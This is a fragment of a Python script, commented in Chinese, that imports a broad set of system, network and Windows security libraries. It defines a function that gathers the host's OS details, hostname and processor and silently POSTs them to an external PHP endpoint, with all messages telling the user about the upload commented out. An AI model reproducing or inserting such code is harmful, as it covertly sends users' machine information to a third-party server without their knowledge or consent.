# 首先，按照标准库和第三方库的顺序进行导入
import os  # 系统操作相关模块
import sys  # 系统特定参数和函数
import platform  # 提供系统平台详细信息模块
import random
import string
import time
import ctypes

# 第三方库导入（按字母顺序排列）
import colorama  # 控制台颜色输出模块
import qrcode
import psutil
import matplotlib.pyplot as plt
from colorama import init, Fore, Style

import getpass  # 密码输入模块
import hashlib  # 散列和加密模块
import json  # JSON数据处理模块
import PIL  # Python图像处理库
from PIL import Image  # 导入PIL中的Image模块
import psutil  # 进程和系统实用工具模块
import requests  # HTTP请求模块
import subprocess  # 子进程管理模块
from urllib.parse import urljoin  # URL解析模块
from bs4 import BeautifulSoup  # HTML或XML解析模块
import win32api  # Windows API接口模块
import win32security  # Windows 安全API模块

#--------------------------------------上传系统信息-----------------------------------
def upload_system_info():
    # 获取系统信息
    system_info = {
        "system": platform.system(),
        "node": platform.node(),
        "release": platform.release(),
        "version": platform.version(),
        "machine": platform.machine(),
        "processor": platform.processor()
    }

    # 上传到后端PHP页面
    url = 'http://1nvweb.top/tools/tools/upload_sysinfo.php'
    response = requests.post(url, data=system_info)

    # 判断上传是否成功并输出提示信息
#    if response.status_code == 200:
#        print("上传成功！")
#        print("上传内容：")
#        for key, value in system_info.items():
#            print(f"{key}: {value}")
#    else:
#        print("上传失败")

#    print(response.text)

# 调用函数上传系统信息